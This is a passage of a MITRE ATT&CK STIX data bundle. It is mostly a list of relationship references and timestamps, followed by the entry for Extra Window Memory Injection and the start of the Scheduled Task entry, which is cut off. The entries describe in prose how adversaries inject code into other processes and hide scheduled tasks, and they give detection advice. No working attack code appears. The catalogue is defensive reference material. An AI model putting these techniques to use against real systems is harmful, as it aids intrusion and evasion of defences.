"2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--de2d023c-d1cf-4819-9d9c-67a772b0e313", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--de56c26f-ea38-4e6e-a933-fdf4cd1932dd", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--de73c6a8-fd33-469d-b7e4-e4f6edd823b9", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--dead5325-7efe-4dcc-bf78-42b9190f74da", "object_modified": "2023-09-29T16:46:40.272Z"}, {"object_ref": "relationship--deb83319-bc5a-4b9b-a44a-bd369b899601", "object_modified": "2024-03-25T20:18:12.056Z"}, {"object_ref": "relationship--def57041-6bb4-453a-bf04-188b9e97a35d", "object_modified": "2023-09-28T21:26:34.603Z"}, {"object_ref": "relationship--def869f4-7564-4a09-8f49-59cb696b660d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--df321d74-25d6-42da-80e8-3c9a291cb471", "object_modified": "2023-09-28T19:57:41.602Z"}, {"object_ref": "relationship--df7b521e-4496-432f-a61d-3094d0c7bc23", "object_modified": "2023-09-29T17:58:26.994Z"}, {"object_ref": "relationship--df80e2b6-5672-4f26-a19c-a394f3731f24", "object_modified": "2023-09-28T19:48:48.649Z"}, {"object_ref": "relationship--df9f5a5b-0662-4904-8e57-bc25c244a6da", "object_modified": "2023-09-28T20:11:11.658Z"}, {"object_ref": "relationship--dfb20521-91c2-4f55-b92a-dab959759b78", "object_modified": "2023-09-29T18:03:38.874Z"}, {"object_ref": "relationship--dfc19325-9b8a-4cb7-80fc-dedc2cf8742a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--dfeb0053-3513-4622-a5c0-a3554c8970a7", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e07acc2b-6a92-423e-85be-a9caed4a8ee6", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e1269074-37f4-460b-8a2a-cd26892d4f8e", "object_modified": "2023-09-28T19:42:54.009Z"}, {"object_ref": "relationship--e128847e-b3ae-420a-b46f-cb9db88f2cf4", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e12a3e0d-4ed1-467b-a2f1-ead1e58b8cae", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e134a00e-8d72-4c3d-a5b1-3f9c6e1bd330", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e17c3b74-69d8-47b2-88d4-adcaf418ab74", "object_modified": "2023-09-29T17:08:48.251Z"}, {"object_ref": "relationship--e1f28ed0-ec35-4792-ae02-a2d003bd3df4", "object_modified": "2023-09-28T20:09:07.381Z"}, {"object_ref": "relationship--e2980209-0a3b-4d12-8a85-1984b8e1844b", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e2a6a14d-87d3-4a8b-966f-fb3c1fab6e87", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e367aefb-5784-4fd8-85ac-56afa3f9e504", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e398ecb9-1e98-4518-aff8-aa18f527f9dc", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e3b04152-0c90-41ff-a333-c5163fa9714f", "object_modified": "2023-09-29T17:41:22.619Z"}, {"object_ref": "relationship--e3fe170d-55c7-4f98-9d39-6ee28403ce87", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e41a04fe-a142-4294-a9f2-576214e1f985", "object_modified": "2024-04-09T20:48:04.616Z"}, {"object_ref": "relationship--e434db5d-f201-4411-825f-4a50e1e78c75", "object_modified": "2023-09-29T17:06:20.834Z"}, {"object_ref": "relationship--e49e0138-4247-4f3e-a42c-f0dab2f6ffbc", "object_modified": "2023-09-29T18:49:44.351Z"}, {"object_ref": "relationship--e4a43af9-e8f0-42cf-a707-b2393efb44f5", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e4bc29f2-87c8-491d-b51b-d6cede7c1972", "object_modified": "2023-09-29T16:45:33.777Z"}, {"object_ref": "relationship--e4c62e59-d14e-4cbc-a4a9-4f64bd523d5a", "object_modified": "2024-05-28T03:34:18.846Z"}, {"object_ref": "relationship--e525352e-0d7e-41e4-bb35-9c50f9ef39c6", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e5c9aacb-51e3-41d3-995d-9e6ed04a2454", "object_modified": "2023-10-02T20:17:51.320Z"}, {"object_ref": "relationship--e67182ae-4edb-4f92-a906-c4c3edd2264d", "object_modified": "2024-05-28T03:35:03.803Z"}, {"object_ref": "relationship--e6867d44-3d34-4604-b5e8-35e325051f1e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e6af4cbd-1b2e-4733-be57-43a845f465eb", "object_modified": "2023-09-28T20:30:32.778Z"}, {"object_ref": "relationship--e6fa0699-430b-4506-9a6d-286b22381206", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e7339f46-a3f5-47c8-9850-313797cd6fb2", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e75f88e6-1ffb-467b-b488-46e91cb3e1e9", "object_modified": "2023-09-28T19:42:16.270Z"}, {"object_ref": "relationship--e79825fb-3bd0-41e7-9bdd-257cd3ab44a2", "object_modified": "2023-09-29T16:45:20.769Z"}, {"object_ref": "relationship--e7abc5ca-ca57-459a-b422-331f3f4d4506", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e7c8615b-2dd4-42a9-9535-2deed30ea8d7", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e83a79df-2555-4b2f-9ade-b9ed2689ae42", "object_modified": "2023-09-29T16:39:41.736Z"}, {"object_ref": "relationship--e8b07bb0-a0d3-49b2-a6c4-f546c50cdb64", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e8ef9bb9-1335-4418-b788-f8220dbbe4c8", "object_modified": "2023-09-28T19:50:30.312Z"}, {"object_ref": "relationship--e915e12c-3d0c-4f60-b119-9414940abb0b", "object_modified": "2023-09-28T20:08:27.145Z"}, {"object_ref": "relationship--e923fe9c-ccae-4d5a-a85c-89b398ee1ed5", "object_modified": "2024-02-06T16:20:42.323Z"}, {"object_ref": "relationship--e92c4fd7-eb92-4255-80c3-abaa9262845f", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--e95fe824-4df1-49a2-abf7-5d76fb47ef42", "object_modified": "2023-09-28T19:45:18.672Z"}, {"object_ref": "relationship--e98892d6-e036-4140-adbb-2932dba51a19", "object_modified": "2023-09-28T20:08:09.519Z"}, {"object_ref": "relationship--ea022ac4-0c8b-4ad0-a160-14640654df2e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--ea774e46-3dcb-4cda-ad99-a012ad8fbb58", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--eac205a6-271b-4a86-acf3-6f4ddefb82c4", "object_modified": "2023-09-29T17:38:59.611Z"}, {"object_ref": "relationship--eadb4ca5-ee99-4169-a926-95b1ff82e960", "object_modified": "2023-09-28T20:28:52.768Z"}, {"object_ref": "relationship--eae674f9-10a2-41e6-9cd3-205af8e69d53", "object_modified": "2023-09-28T20:05:15.314Z"}, {"object_ref": "relationship--eb171086-88e1-4f24-bd7e-c3f8b3c3283b", "object_modified": "2023-09-28T19:44:09.311Z"}, {"object_ref": "relationship--eb5310c6-7500-4b16-8ca7-6678c6232001", "object_modified": "2023-09-29T19:36:38.824Z"}, {"object_ref": "relationship--ebc9f35c-6f95-4bc0-b8b3-f9b515690fa0", "object_modified": "2023-09-29T17:09:37.977Z"}, {"object_ref": "relationship--ec467f15-0f62-483f-a250-da5109e6936a", "object_modified": "2024-05-28T03:35:52.158Z"}, {"object_ref": "relationship--ecaf20c0-d881-45b4-98f2-a456e07d3643", "object_modified": "2023-09-28T21:25:48.379Z"}, {"object_ref": "relationship--ecdbe751-ef08-41fe-8c13-27ffaae30312", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--ecf3d7ec-a8f9-435a-9c09-6d264f319728", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--ed095993-bc85-431e-9621-437143f16d44", "object_modified": "2023-09-29T17:44:09.285Z"}, {"object_ref": "relationship--ed3ce006-cf41-46f6-bd86-054314c130dc", "object_modified": "2023-09-28T21:15:57.120Z"}, {"object_ref": "relationship--ed3de8e8-e09c-4273-8f68-da5219a7e9ee", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--ed3ef546-566a-46c7-918e-7bfa10d05991", "object_modified": "2023-09-29T17:06:47.370Z"}, {"object_ref": "relationship--ed66e087-8877-4146-a16a-44cfd144a3d8", "object_modified": "2023-09-29T17:07:00.450Z"}, {"object_ref": "relationship--ed8b97e2-5966-4844-a636-524541a46e43", "object_modified": "2023-09-29T16:39:18.448Z"}, {"object_ref": "relationship--ed9b40ef-51ff-4263-a99e-5c95bae3e17d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--eda23a3d-a1d0-4e98-85fc-5ac083f53f5c", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--edaa6f5c-1b59-4ecb-a20f-716a61cdaccb", "object_modified": "2023-09-29T16:39:29.206Z"}, {"object_ref": "relationship--edccbe1f-a07a-405e-9b9a-b247ce3dcc9b", "object_modified": "2023-09-29T17:58:54.996Z"}, {"object_ref": "relationship--ede2b798-2f39-419e-a7d3-8f0c733af4c1", "object_modified": "2023-09-28T21:12:00.004Z"}, {"object_ref": "relationship--edf5f8bd-4258-4d84-b5fc-d90984b68eee", "object_modified": "2024-05-28T03:36:29.404Z"}, {"object_ref": "relationship--edfa4bcb-6304-42df-b7c6-8caf480c66f2", "object_modified": "2023-09-29T17:58:04.082Z"}, {"object_ref": "relationship--ee14c1f8-55f5-4fcf-adc3-dc34d6ade005", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--ee212490-822c-4851-bf2f-06b8179a9a38", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--ee72cc27-2e78-47c4-8786-1351f9bcee97", "object_modified": "2023-09-28T20:05:33.450Z"}, {"object_ref": "relationship--ee74a23f-5981-4601-8321-a5db7af73f77", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--eebae2f3-aaa1-4410-8b75-db5bdac1d4d6", "object_modified": "2023-09-28T20:04:07.868Z"}, {"object_ref": "relationship--eeeb83cb-0a8a-412b-aae2-aede7c43d8e8", "object_modified": "2023-09-28T21:11:45.241Z"}, {"object_ref": "relationship--ef02e21a-5ccd-4a69-a735-b9eba6f08b91", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--ef087ae8-5b2c-4cc9-99f0-c3f9550fc94e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--ef1787e0-add4-4490-9777-33462acf9325", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--ef60735b-c64b-465c-9e5f-46a4d3a49fb3", "object_modified": "2023-09-28T19:54:48.577Z"}, {"object_ref": "relationship--eff19f74-4940-4c8e-a3b3-b3c16fe3f5e0", "object_modified": "2023-09-29T16:39:09.447Z"}, {"object_ref": "relationship--f006c972-d4a0-4bbe-b5ff-985b9aaf5886", "object_modified": "2024-05-28T03:37:21.471Z"}, {"object_ref": "relationship--f05a2592-00f9-4f1f-ba55-395af5444b96", "object_modified": "2023-09-29T17:42:29.179Z"}, {"object_ref": "relationship--f079c0cc-744a-4a89-a596-a2a3d4353fac", "object_modified": "2024-05-22T17:02:36.183Z"}, {"object_ref": "relationship--f08d487a-7837-48f9-9301-fe0f9f144c92", "object_modified": "2023-09-28T20:31:04.691Z"}, {"object_ref": "relationship--f0d4d23c-2c8c-4731-9b81-7c86fed25b5d", "object_modified": "2023-09-29T18:45:34.258Z"}, {"object_ref": "relationship--f10611e9-4812-4780-a1d5-0ad537dd95fb", "object_modified": "2023-09-28T21:23:01.421Z"}, {"object_ref": "relationship--f13dac1a-090b-40c6-9093-eb4abe0deba8", "object_modified": "2023-09-28T21:24:22.815Z"}, {"object_ref": "relationship--f1793a83-f51c-48d4-b11e-ee9c93a28e71", "object_modified": "2023-07-20T15:30:58.855Z"}, {"object_ref": "relationship--f18ac720-632d-4761-89b1-258a67710a1b", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f19c34b2-ef3a-4581-b604-6639f501e32f", "object_modified": "2023-10-02T20:20:32.163Z"}, {"object_ref": "relationship--f1b32781-5cc4-40b3-a9b9-af069657665a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f1bd607f-36ac-4a90-be04-b74b2297a9a7", "object_modified": "2024-05-21T16:23:41.117Z"}, {"object_ref": "relationship--f1edb034-6dc6-4d6c-8f75-e2cd12213704", "object_modified": "2023-09-29T17:07:38.219Z"}, {"object_ref": "relationship--f2ce3446-c0ca-499c-bc7f-1930ce148285", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f2d8189b-efc4-47ff-8b63-ec58e18abc7e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f353e8ec-0766-4fbd-86b7-9ea06b52958b", "object_modified": "2023-09-28T21:23:51.038Z"}, {"object_ref": "relationship--f3dd024f-40b6-4dae-bbc0-8e7ce0fbf774", "object_modified": "2024-05-28T03:38:33.205Z"}, {"object_ref": "relationship--f4afb180-4b30-4ed1-b094-3d74d8fd0cf1", "object_modified": "2023-09-28T19:49:56.464Z"}, {"object_ref": "relationship--f4c17470-c5c0-4680-ad4a-5efae63b0be6", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f4c8b1b6-8204-4cbd-be5b-f3a6080726e7", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f4dc8dba-ec23-4d49-a736-c5b1edf5e53e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f531e763-3550-40ba-a6a1-81e208ca12c6", "object_modified": "2023-09-29T16:41:06.217Z"}, {"object_ref": "relationship--f5621ad9-c905-42e3-b59b-e0ae7b9051c7", "object_modified": "2023-09-28T21:26:23.361Z"}, {"object_ref": "relationship--f5c91d82-5f7c-4e40-a85a-4f1909ae5545", "object_modified": "2023-09-29T18:44:50.280Z"}, {"object_ref": "relationship--f5c9f641-a498-46b5-9068-39502db53cfd", "object_modified": "2023-09-28T20:10:55.590Z"}, {"object_ref": "relationship--f5fc2b7c-72d3-47be-8287-9608b6beb63d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f61944a4-fef5-4989-bc3d-68f86e65d7d4", "object_modified": "2023-09-29T17:04:55.720Z"}, {"object_ref": "relationship--f61e474c-d7be-411e-a30e-0a1ef872fe51", "object_modified": "2023-09-29T17:05:20.132Z"}, {"object_ref": "relationship--f630f321-d227-414b-9272-fe19268779e0", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f6514d17-d599-4a45-93b2-a80b4aa39dde", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f655e6a0-431c-4996-859d-2e1952f26d2e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f65fa052-5ad0-4fc3-b579-ee33d1225659", "object_modified": "2023-09-28T19:55:58.229Z"}, {"object_ref": "relationship--f67134f6-7f34-4b8a-89ef-9ecd6d9ca191", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f691dde5-bb2d-411b-a381-b33e0ab673d6", "object_modified": "2023-09-28T20:12:09.661Z"}, {"object_ref": "relationship--f6c52b80-6bbc-4a80-9455-40046356cb98", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f6dab4c6-6f2e-4038-827f-16aa1fd7d8e9", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f6e3972b-afc2-4dd6-972a-4fe73747dfe4", "object_modified": "2023-09-05T14:19:19.911Z"}, {"object_ref": "relationship--f7215c1f-7bd7-41bd-8466-76caac225c7c", "object_modified": "2023-09-29T16:45:42.977Z"}, {"object_ref": "relationship--f72a7a30-bab4-445b-b226-d5c3cd1a5846", "object_modified": "2023-09-29T18:47:39.450Z"}, {"object_ref": "relationship--f7a11ad8-80ac-4b0e-8749-102958f57f62", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f7b8ef19-94d4-46a2-9fcc-25503d324366", "object_modified": "2024-05-28T03:39:08.920Z"}, {"object_ref": "relationship--f7bdbc1f-d08c-48a0-a474-a79b91526138", "object_modified": "2023-09-28T20:31:31.498Z"}, {"object_ref": "relationship--f7d672f6-993b-4036-961d-f6e22e94446c", "object_modified": "2024-04-09T20:48:30.734Z"}, {"object_ref": "relationship--f823cffe-1f48-499e-a7b9-58f12e0b95b4", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f8456c9b-a4a5-4f13-94e3-54c787b21089", "object_modified": "2023-09-28T20:16:40.519Z"}, {"object_ref": "relationship--f8aaf144-17a2-41b5-b723-a80cb43a8c75", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f8c320cc-97f5-4b3a-8847-92c42b6a48b7", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f92764db-a880-4726-9d28-a035170f790c", "object_modified": "2023-09-28T21:22:35.236Z"}, {"object_ref": "relationship--f96dd8b2-6b49-4a64-a867-a571a9c0016e", "object_modified": "2024-05-28T03:39:45.734Z"}, {"object_ref": "relationship--f9867ca2-18a1-4e84-ad1d-61d7c85fe4b3", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--f9907fb1-976b-4f51-ac13-b45f2ff9452b", "object_modified": "2023-09-28T19:48:37.072Z"}, {"object_ref": "relationship--fac4bc88-af9b-4eec-b041-e4138b49c3c0", "object_modified": "2023-09-29T16:28:04.180Z"}, {"object_ref": "relationship--fadbdca3-3c98-497c-a156-e53b89664359", "object_modified": "2023-09-28T20:16:55.038Z"}, {"object_ref": "relationship--fb82f6d3-0e6b-4fa5-a54a-f7deb28f8324", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fc123d2e-3cd6-4d14-929c-8eb9c9a7cdd2", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fc189fa0-1235-46ac-a802-f226dc0ec4e1", "object_modified": "2023-09-29T17:38:28.664Z"}, {"object_ref": "relationship--fc26d209-c7fb-4d59-82da-0be7c72c651d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fc787de3-8a82-43f6-b649-f01a7006be54", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fca5a1c7-8548-4621-97b5-023572344ae4", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fcba6a58-72b0-4d54-a887-740624e22f6f", "object_modified": "2024-03-26T15:42:36.840Z"}, {"object_ref": "relationship--fcc47ea4-e7bf-4d33-8601-f2fe47d2021e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fcdcb31d-2e52-43f4-a883-c60325a13075", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fcfa67b5-03dc-4d92-bc34-0f483d48bc6a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fd309395-8fcc-402c-9227-90ac897fd602", "object_modified": "2024-03-26T15:41:39.905Z"}, {"object_ref": "relationship--fd31c763-8e36-4f6f-9238-fed081b524b3", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fd3ba994-75a3-4b1e-bfea-8e36b9a07015", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fd3bc308-82cd-49c9-a41e-9b19ce04b3cd", "object_modified": "2023-10-02T20:23:41.227Z"}, {"object_ref": "relationship--fd44a14f-1ca5-4356-a6fe-c5507a77d490", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fd7ca8e8-82fc-443d-945a-fcef3352ec8a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fdb054f1-0446-4af0-b11c-790fbf352014", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fdc20415-c9a1-405e-80af-3d297894e8fa", "object_modified": "2023-09-28T19:58:30.849Z"}, {"object_ref": "relationship--fe061ca4-3182-49b7-a70c-96c58e19d9bc", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--fe22f626-ddf3-4d5e-97d1-058878d7830f", "object_modified": "2023-09-28T21:10:39.025Z"}, {"object_ref": "relationship--fe265dd7-2c1a-4c75-8aa8-12d0c82c7926", "object_modified": "2023-09-28T21:26:59.998Z"}, {"object_ref": "relationship--fe538c59-703a-4e04-8bde-64d192db8bdd", "object_modified": "2024-05-28T03:42:15.910Z"}, {"object_ref": "relationship--fe8358f5-ead6-4ae7-a88c-831dda8ab123", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--feb5c75b-6c19-48fa-aa49-f2796ae96905", "object_modified": "2024-05-28T03:40:57.156Z"}, {"object_ref": "relationship--febaa044-5467-4393-bd13-2d096be02cf4", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--feccce31-b855-430b-a0f6-6e3a3eb41bf9", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--ff021e27-63be-41f4-bc4d-2ce75d8a3ecb", "object_modified": "2023-09-28T19:56:26.241Z"}, {"object_ref": "relationship--ff0d8860-9790-4a15-93c7-17f01d63b2ad", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "relationship--ff107632-751b-4efb-86bd-af670b48d35d", "object_modified": "2023-09-28T21:21:30.387Z"}, {"object_ref": "relationship--ff2155fa-714d-4d99-a610-91ceb5f049ef", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "object_modified": "2023-09-27T15:31:28.155Z"}, {"object_ref": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", "object_modified": "2024-05-31T17:44:18.529Z"}], "x_mitre_deprecated": false, "x_mitre_version": "0.1", "type": "x-mitre-collection", "spec_version": "2.1", "id": "x-mitre-collection--65308859-6f82-4c17-8734-0631f5a88498", "created": "2024-05-30T19:20:15.020Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "x_mitre_domains": [], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"modified": "2024-05-21T16:23:41.133Z", "name": "Extra Window Memory Injection", "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process\u00e2\u0080\u0099s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process\u00e2\u0080\u0099s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": [], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Application control"], "x_mitre_effective_permissions": [], "x_mitre_permissions_required": [], "x_mitre_system_requirements": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", "created": "2020-01-14T17:18:32.126Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1055/011", "external_id": "T1055.011"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "MalwareTech Power Loader Aug 2013", "description": "MalwareTech. (2013, August 13). PowerLoader Injection \u00e2\u0080\u0093 Something truly amazing. Retrieved December 16, 2017.", "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html"}, {"source_name": "WeLiveSecurity Gapz and Redyms Mar 2013", "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.", "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/"}, {"source_name": "Microsoft Window Classes", "description": "Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx"}, {"source_name": "Microsoft GetWindowLong function", "description": "Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx"}, {"source_name": "Microsoft SendNotifyMessage function", "description": "Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx"}, {"source_name": "Microsoft SetWindowLong function", "description": "Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-11-15T14:33:53.354Z", "name": "Scheduled Task", "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Andrew Northern, @ex_raritas", "Bryan Campbell, @bry_campbell", "Zachary Abzug, 